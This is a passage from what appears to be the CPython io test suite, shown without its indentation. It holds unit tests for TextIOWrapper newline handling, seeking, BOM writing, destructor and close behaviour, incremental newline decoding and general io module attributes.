(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
